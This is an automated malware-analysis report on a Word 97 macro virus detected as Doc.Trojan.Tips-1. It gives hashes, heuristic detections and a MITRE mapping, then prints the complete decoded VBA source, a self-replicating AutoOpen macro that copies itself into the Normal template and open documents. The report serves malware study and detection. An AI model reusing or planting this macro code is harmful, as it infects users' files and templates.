Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c2b366faaf664f24…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 39.0 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 6e5400d574b47ecf66058ba4f6d5389c
SHA-1: 7a3537043dc1eac4bf76eecc3bc5b728af00365c
SHA-256: c2b366faaf664f24a5cc3622fa175bd17ec6765fae5184f6a5119dc5eda69c90
Risk Score: 248

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic macro markers and a detected AutoOpen macro, indicating it is designed to execute code when opened. The macro code, though truncated, appears to manipulate document properties and potentially copy itself, suggesting a downloader or self-propagating malware. The presence of specific strings like 'Macro created 01/18/99 by billgates from cuddapah' suggests a deliberate attempt to mislead or attribute the macro to a known figure.

Heuristics (5)

  • ClamAV: Doc.Trojan.Tips-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Tips-1
  • VBA macros detected (severity: medium; 2 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (severity: critical; rule: OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
    Application.OrganizerCopy source_name, target_name, "AutoOpen", wdOrganizerObjectProjectItems
  • AutoOpen macro (severity: low; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
    Attribute VB_Name = "AutoOpen"
  • Legacy WordBasic macro-virus markers (severity: high; rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4156 bytes
SHA-256: 96e75253a383d60ed5e9a6aeb3296abe45293db27adbda307df269f321a2cc93
Detection: ClamAV: Doc.Trojan.Tips-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro created 01/18/99 by billgates from cuddapah"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.AutoOpen.AutoOpen"
'
' AutoOpen Macro
' Macro created 01/18/99 by CUDDAPAH BELLGATES FROM MACROSHOFT
'
Dim newstr, filenme, oldstr, normal_template As String
Dim o_docname, n_docname As String
Dim source_name, target_name, temp_var As String
Dim cond_name As String
Dim vrbl As Integer
Dim i, target_flag As Integer
Dim j As Long
Dim cntnr As Object

Dim retval

Set cntnr = MacroContainer
'MsgBox cntnr.Name & "  Is the container of this running code", vbCritical
cond_name = cntnr.Name


On Error GoTo err1

'newstr = Application.ActiveWindow.Caption
'filenme = newstr
'newstr = newstr & " " & " "
'Application.Caption = "Macroshoft Word"
'oldstr = newstr
'Application.ActiveWindow.Caption = newstr
'Application.StatusBar = "Remember Microsoft Word is a Product of ORACLE Corporation INC!!!."
o_docname = Application.ActiveDocument.Path & "\" & Application.ActiveDocument.Name
 

' ********* getting the source file name **********

If cond_name = Application.NormalTemplate.Name Then

target_flag = 0
source_name = Application.NormalTemplate.Path & "\" & Application.NormalTemplate.Name
target_name = Application.ActiveDocument.Path & "\" & Application.ActiveDocument.Name

Else

target_flag = 1
source_name = Application.ActiveDocument.Path & "\" & Application.ActiveDocument.Name
target_name = Application.NormalTemplate.Path & "\" & Application.NormalTemplate.Name

End If


'MsgBox source_name & " " & target_name
'on counter set to four then message and counter = 0

temp_var = System.PrivateProfileString("C:\micros.Ini", "MacroSettings", _
    "LastFile")
vrbl = Val(temp_var)

If vrbl = "8" Then
vrbl = 0
System.PrivateProfileString("C:\Micros.Ini", "MacroSettings", _
    "LastFile") = Str(vrbl)
 Set BLN = Assistant.NewBalloon
 
 
With BLN
    .Heading = "Tips of day"
    .Labels(1).Text = "Run Scandisk Every Day"
    .Labels(2).Text = "Run Defrag Once in a Week"
    .Labels(3).Text = "Dont use Drive Compression."
    .BalloonType = msoBalloon
    .Mode = msoModeModal
    .Icon = msoIconAlert
    .Button = msoButtonSetOK
    
     retval = .Show
End With
Application.ActiveWindow.Close
End If

vrbl = vrbl + 1
System.PrivateProfileString("C:\Micros.Ini", "MacroSettings", _
    "LastFile") = Str(vrbl)

'MsgBox System.PrivateProfileString("C:\VirSet.Ini", "MacroSettings", _
    "LastFile")

normal_template = Application.NormalTemplate.Name




On Error GoTo err0

deletemacros (target_flag)


Application.OrganizerCopy source_name, target_name, "AutoOpen", wdOrganizerObjectProjectItems
Application.OrganizerCopy source_name, target_name, "ToolsMacro", wdOrganizerObjectProjectItems

If target_name = normal_template Then
Application.NormalTemplate.Save
End If

Application.ActiveDocument.Save

'MsgBox o_docname
'MsgBox Application.ActiveDocument.Name
err0:
'MsgBox Err.Description

Exit Sub
err1:
End Sub


Public Function deletemacros(t_flag As Integer)
'If t_flag = 0 Then MsgBox "Target is Active Document"
'If t_flag = 1 Then MsgBox "target is normal template"

Dim mct, u As Integer
Dim ass As String


If t_flag = 0 Then
    mct = ActiveDocument.VBProject.VBComponents.Count
    For u = 2 To mct
    ass = ActiveDocument.VBProject.VBComponents.Item(u).Name
    Application.OrganizerDelete ActiveDocument.Name, ass, wdOrganizerObjectProjectItems
    Next

End If

If t_flag = 1 Then
    mct = NormalTemplate.VBProject.VBComponents.Count
    For u = 2 To mct
    ass = NormalTemplate.VBProject.VBComponents.Item(u).Name
    Application.OrganizerDelete NormalTemplate.Name, ass, wdOrganizerObjectProjectItems
    Next

End If




End Function